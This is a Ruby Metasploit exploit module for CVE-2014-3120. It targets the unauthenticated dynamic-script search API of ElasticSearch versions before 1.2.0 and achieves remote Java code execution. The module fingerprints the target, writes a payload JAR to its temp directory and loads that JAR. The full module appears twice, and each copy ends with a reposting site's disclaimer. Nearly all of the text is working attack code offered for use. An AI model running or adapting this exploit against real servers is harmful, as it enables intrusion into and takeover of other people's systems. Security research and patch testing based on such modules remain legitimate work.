##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in ElasticSearch,
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
REST API, which requires no authentication or authorization, where the search
function allows dynamic scripts execution, and can be used for remote attackers
to execute arbitrary Java code. This module has been tested successfully on
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
},
'Author' =>
[
'Alex Brasetvik', # Vulnerability discovery
'Bouke van der Bijl', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-3120'],
['OSVDB', '106949'],
['EDB', '33370'],
['URL', 'http://bouk.co/blog/elasticsearch-rce/'],
['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'ElasticSearch 1.1.1 / Automatic', { } ]
],
'DisclosureDate' => 'Dec 09 2013',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9200),
OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]),
OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ])
], self.class)
end
def check
result = Exploit::CheckCode::Safe
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
result
end
def exploit
print_status("#{peer} - Trying to execute arbitrary Java..")
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end
print_status("#{peer} - Asking remote OS...")
res = execute(java_os)
result = parse_result(res)
if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...")
else
print_good("#{peer} - OS #{result} found")
end
jar_file = ""
if result =~ /win/i
print_status("#{peer} - Asking TEMP path")
res = execute(java_tmp_dir)
result = parse_result(res)
if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...")
else
print_good("#{peer} - TEMP path found on #{result}")
end
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
else
jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")
end
register_file_for_cleanup(jar_file)
execute(java_payload(jar_file))
end
def vulnerable?
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
java = java_sum([addend_one, addend_two])
res = execute(java)
result = parse_result(res)
if result.nil?
return false
else
result.to_i == sum
end
end
def parse_result(res)
unless res && res.code == 200 && res.body
return nil
end
begin
json = JSON.parse(res.body.to_s)
rescue JSON::ParserError
return nil
end
begin
result = json['hits']['hits'][0]['fields']['msf_result'][0]
rescue
return nil
end
result
end
def java_sum(summands)
source = <<-EOF
#{summands.join(" + ")}
EOF
source
end
def to_java_byte_array(str)
buff = "byte[] buf = new byte[#{str.length}];\n"
i = 0
str.unpack('C*').each do |c|
buff << "buf[#{i}] = #{c};\n"
i = i + 1
end
buff
end
def java_os
"System.getProperty(\"os.name\")"
end
def java_tmp_dir
"System.getProperty(\"java.io.tmpdir\");"
end
def java_payload(file_name)
source = <<-EOF
import java.io.*;
import java.lang.*;
import java.net.*;
#{to_java_byte_array(payload.encoded_jar.pack)}
File f = new File('#{file_name.gsub(/\\/, "/")}');
FileOutputStream fs = new FileOutputStream(f);
bs = new BufferedOutputStream(fs);
bs.write(buf);
bs.close();
bs = null;
URL u = f.toURI().toURL();
URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});
Class c = cl.loadClass('metasploit.Payload');
c.main(null);
EOF
source
end
def execute(java)
payload = {
"size" => 1,
"query" => {
"filtered" => {
"query" => {
"match_all" => {}
}
}
},
"script_fields" => {
"msf_result" => {
"script" => java
}
}
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "_search"),
'method' => 'POST',
'data' => JSON.generate(payload)
})
return res
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in ElasticSearch,
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
REST API, which requires no authentication or authorization, where the search
function allows dynamic scripts execution, and can be used for remote attackers
to execute arbitrary Java code. This module has been tested successfully on
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
},
'Author' =>
[
'Alex Brasetvik', # Vulnerability discovery
'Bouke van der Bijl', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-3120'],
['OSVDB', '106949'],
['EDB', '33370'],
['URL', 'http://bouk.co/blog/elasticsearch-rce/'],
['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'ElasticSearch 1.1.1 / Automatic', { } ]
],
'DisclosureDate' => 'Dec 09 2013',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9200),
OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]),
OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ])
], self.class)
end
def check
result = Exploit::CheckCode::Safe
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
result
end
def exploit
print_status("#{peer} - Trying to execute arbitrary Java..")
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end
print_status("#{peer} - Asking remote OS...")
res = execute(java_os)
result = parse_result(res)
if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...")
else
print_good("#{peer} - OS #{result} found")
end
jar_file = ""
if result =~ /win/i
print_status("#{peer} - Asking TEMP path")
res = execute(java_tmp_dir)
result = parse_result(res)
if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...")
else
print_good("#{peer} - TEMP path found on #{result}")
end
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
else
jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")
end
register_file_for_cleanup(jar_file)
execute(java_payload(jar_file))
end
def vulnerable?
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
java = java_sum([addend_one, addend_two])
res = execute(java)
result = parse_result(res)
if result.nil?
return false
else
result.to_i == sum
end
end
def parse_result(res)
unless res && res.code == 200 && res.body
return nil
end
begin
json = JSON.parse(res.body.to_s)
rescue JSON::ParserError
return nil
end
begin
result = json['hits']['hits'][0]['fields']['msf_result'][0]
rescue
return nil
end
result
end
def java_sum(summands)
source = <<-EOF
#{summands.join(" + ")}
EOF
source
end
def to_java_byte_array(str)
buff = "byte[] buf = new byte[#{str.length}];\n"
i = 0
str.unpack('C*').each do |c|
buff << "buf[#{i}] = #{c};\n"
i = i + 1
end
buff
end
def java_os
"System.getProperty(\"os.name\")"
end
def java_tmp_dir
"System.getProperty(\"java.io.tmpdir\");"
end
def java_payload(file_name)
source = <<-EOF
import java.io.*;
import java.lang.*;
import java.net.*;
#{to_java_byte_array(payload.encoded_jar.pack)}
File f = new File('#{file_name.gsub(/\\/, "/")}');
FileOutputStream fs = new FileOutputStream(f);
bs = new BufferedOutputStream(fs);
bs.write(buf);
bs.close();
bs = null;
URL u = f.toURI().toURL();
URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});
Class c = cl.loadClass('metasploit.Payload');
c.main(null);
EOF
source
end
def execute(java)
payload = {
"size" => 1,
"query" => {
"filtered" => {
"query" => {
"match_all" => {}
}
}
},
"script_fields" => {
"msf_result" => {
"script" => java
}
}
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "_search"),
'method' => 'POST',
'data' => JSON.generate(payload)
})
return res
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information